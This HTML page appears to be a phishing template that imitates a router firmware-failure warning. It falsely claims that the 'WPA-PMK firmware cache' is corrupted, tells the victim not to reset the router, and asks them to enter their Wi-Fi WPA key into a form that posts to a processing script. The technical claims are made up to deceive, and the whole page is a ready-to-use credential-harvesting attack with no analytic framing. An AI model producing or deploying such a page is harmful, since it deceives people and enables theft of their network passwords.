<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="CoffeeCup HTML Editor (www.coffeecup.com)">
    <meta name="dcterms.created" content="Sun, 20 Oct 2013 14:44:05 GMT">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <title>firmware failure warning 4478</title>
    <! -- background-image:url(''); -->
    <style type="text/css">
    <!--
    body {
      color:#000000;
      background-color:#FFFFFF;
      background-image: url('');
      background-repeat:no-repeat;
    }
    a  { color:#0000FF; }
    a:visited { color:#800080; }
    a:hover { color:#008000; }
    a:active { color:#FF0000; }
    -->
    </style>
    <!--[if IE]>
    <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
  </head>
<title>Protected Object</title></head><body>
<h1><div align="left">Protected Object Failure</h1></div>
<div align="left"><b></h1><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The object module on the Routers' RomPager Server is protected.</b></div>
  <body>
<br />
<br />
<b>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<u>ROM Fault Page:</u><br /> 
<br />
<br />
<div align="center"><object width='70%' height='50' type='text/plain' data='routertype' border='2' ></object></div>
<br />
<div align="left"><b>&nbsp&nbsp&nbsp&nbsp&nbsp&nbspWPA-PMK Firmware cache is corrupted.  HTTP html page dycryption unreadable.<br /></div>
<br />
<div align="left"><b>&nbsp&nbsp&nbsp&nbsp&nbsp&nbspWarning <u>DO NOT</u> unplug or reset router - firmware protection and router function will be lost. </b></div>
<br />
<div align="left"></>&nbsp&nbsp&nbsp&nbsp&nbsp&nbspTo reinitialize the WPA firmware cache, <u>enter</u> your WPA key below.</b></div>
<div align="center"></div>
<br />
<br />
  <center>
<form action="process-form-data.php" method="post">
<fieldset style="border: none;"><!-- Removes Large Border around the input area -->
<table width="320">
	<tr>
		<td colspan="1" align=right><strong>WPA&nbsp;Key</strong>:&nbsp&nbsp</td>
		<td colspan="3" width="100%"><input style="width:100%;" name="login" type="text"/></td>

	</tr>
    <tr>
		<td colspan="1" align=right><strong>WPA&nbsp;Key</strong>:&nbsp&nbsp</td>
		<td colspan="3" width="100%"><input style="width:100%;" type="text" name="password" /></td>
	</tr>

	</tr>
	<tr>
	</tr>
	<tr></tr>
	<td align=right><input type="submit" value="Submit" name="facebook" /></td>
  <tr></tr>
</table>
<div align="right"><font size="3"><sub><i>firmware product page <u>20223</u></i></sub></font></div>
  </body>
</html>